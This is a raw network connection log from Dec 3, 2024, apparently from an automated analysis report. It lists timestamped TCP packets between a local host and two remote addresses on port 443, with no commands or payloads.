                                            Dec 3, 2024 09:57:46.690964937 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.690999031 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.691050053 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.691334009 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.691345930 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.691710949 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.691723108 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.692441940 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.692450047 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.692492008 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.692578077 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.692590952 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.693388939 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.693397045 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.693444014 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.693857908 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.693905115 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.693953037 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.693954945 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.693962097 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.694034100 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.694048882 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.408041000 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.408696890 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.408725977 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.409346104 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.409349918 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.410784960 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.411041021 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.411047935 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.411379099 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.411381960 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.472996950 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.473418951 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.473448038 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.473750114 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.473753929 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.538549900 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.538885117 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.538894892 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.539241076 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.539247036 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.540173054 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.540405035 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.540429115 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.540714979 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.540719986 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.844244003 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.844297886 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.844351053 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.844516039 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.844532013 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.844542027 CET49769443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.844547033 CET4434976913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847067118 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847129107 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847177982 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847260952 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847285986 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847290039 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847292900 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847301006 CET49771443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847305059 CET4434977113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.847359896 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847480059 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.847495079 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.849193096 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.849215984 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.849284887 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.849404097 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.849411964 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.923800945 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.923825026 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.923876047 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.923886061 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.923929930 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.924058914 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.924062967 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.924077034 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.924186945 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.924211025 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.924253941 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.926189899 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.926208973 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.926281929 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.926420927 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.926429987 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997236013 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997257948 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997318983 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.997328043 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997370005 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.997524023 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.997526884 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997539997 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.997677088 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997700930 CET4434977013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.997741938 CET49770443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.998366117 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998388052 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998442888 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.998456955 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998526096 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.998538017 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998543978 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.998650074 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998672009 CET4434977213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.998709917 CET49772443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.999638081 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.999654055 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:48.999713898 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.999814034 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:48.999824047 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:49.000180006 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:49.000189066 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:49.000241995 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:49.000328064 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:49.000335932 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.628858089 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.631849051 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.631871939 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.632379055 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.632384062 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.694191933 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.694566965 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.694597006 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.694941998 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.694947004 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.770320892 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.770665884 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.770704985 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.770991087 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.770996094 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.780128002 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.780352116 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.780385017 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.780564070 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.780637980 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.780643940 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.780787945 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.780795097 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:50.781066895 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:50.781070948 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.073946953 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.074011087 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.074059963 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.074268103 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.074287891 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.074297905 CET49775443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.074302912 CET4434977513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.076913118 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.076951027 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.077006102 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.077125072 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.077136993 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.147731066 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.147789001 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.147836924 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.147963047 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.147984028 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.147993088 CET49774443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.147999048 CET4434977413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.150446892 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.150486946 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.150547028 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.150687933 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.150695086 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.223577023 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.223635912 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.223690987 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.223833084 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.223833084 CET49777443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.223850965 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.223860025 CET4434977713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.224134922 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.224190950 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.224234104 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.224442959 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.224458933 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.224468946 CET49776443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.224473953 CET4434977613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.225117922 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.225176096 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.225219011 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.225630999 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.225635052 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.225649118 CET49778443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.225651979 CET4434977813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.227101088 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227123976 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.227173090 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227659941 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227689028 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.227741003 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227778912 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227791071 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.227873087 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.227885962 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.228533983 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.228542089 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:51.228595018 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.228686094 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:51.228692055 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.173893929 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:52.173954010 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:52.174016953 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:52.174207926 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:52.174220085 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:52.928287029 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.928797007 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:52.928838968 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.929199934 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:52.929203987 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.931082964 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.931304932 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:52.931328058 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:52.931602955 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:52.931610107 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.007793903 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.008120060 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.008146048 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.008443117 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.008449078 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.009536982 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.009752989 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.009779930 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.010025024 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.010030031 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.073348999 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.073638916 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.073652029 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.073997021 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.074002028 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.375534058 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.375602007 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.375786066 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.376077890 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.376091957 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.376101017 CET49780443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.376105070 CET4434978013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.381948948 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.382010937 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.382065058 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.382405043 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.382424116 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.382432938 CET49779443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.382438898 CET4434977913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.384840965 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.384886980 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.384931087 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.384953022 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.384964943 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.385021925 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.385078907 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.385093927 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.385149956 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.385160923 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.452187061 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.452250004 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.452315092 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.452446938 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.452465057 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.452477932 CET49781443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.452482939 CET4434978113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.454739094 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.454751968 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.454811096 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.454950094 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.454961061 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.490452051 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.490520954 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.490576029 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.490669012 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.490688086 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.490699053 CET49782443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.490704060 CET4434978213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.492561102 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.492602110 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.492680073 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.492794991 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.492810011 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.527013063 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.527080059 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.527128935 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.527223110 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.527234077 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.527242899 CET49783443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.527245998 CET4434978313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.529047966 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.529073954 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.529136896 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.529253006 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:53.529268026 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:53.909430027 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:53.909684896 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:53.909715891 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:53.910037994 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:53.910443068 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:53.910501957 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:53.953896046 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:55.164578915 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.165096998 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.165116072 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.165626049 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.165632010 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.165839911 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.166080952 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.166100979 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.166402102 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.166408062 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.210422993 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.210819006 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.210849047 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.211066961 CET49788443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.211074114 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.275592089 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.275913954 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.275930882 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.276268005 CET49787443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.276273966 CET4434978713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.374172926 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.374501944 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.374521017 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.374810934 CET49789443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.374816895 CET4434978913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.609314919 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.609371901 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.609497070 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.609700918 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.609719038 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.609729052 CET49786443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.609734058 CET4434978613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.610501051 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.610570908 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.610636950 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.610750914 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.610766888 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.610775948 CET49785443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.610780954 CET4434978513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.612374067 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612405062 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.612474918 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612551928 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612592936 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.612611055 CET49790443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612617970 CET4434979013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.612652063 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612814903 CET49791443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:55.612829924 CET4434979113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.646325111 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.646378994 CET4434978813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:55.646522999 CET49788443192.168.2.413.107.246.63
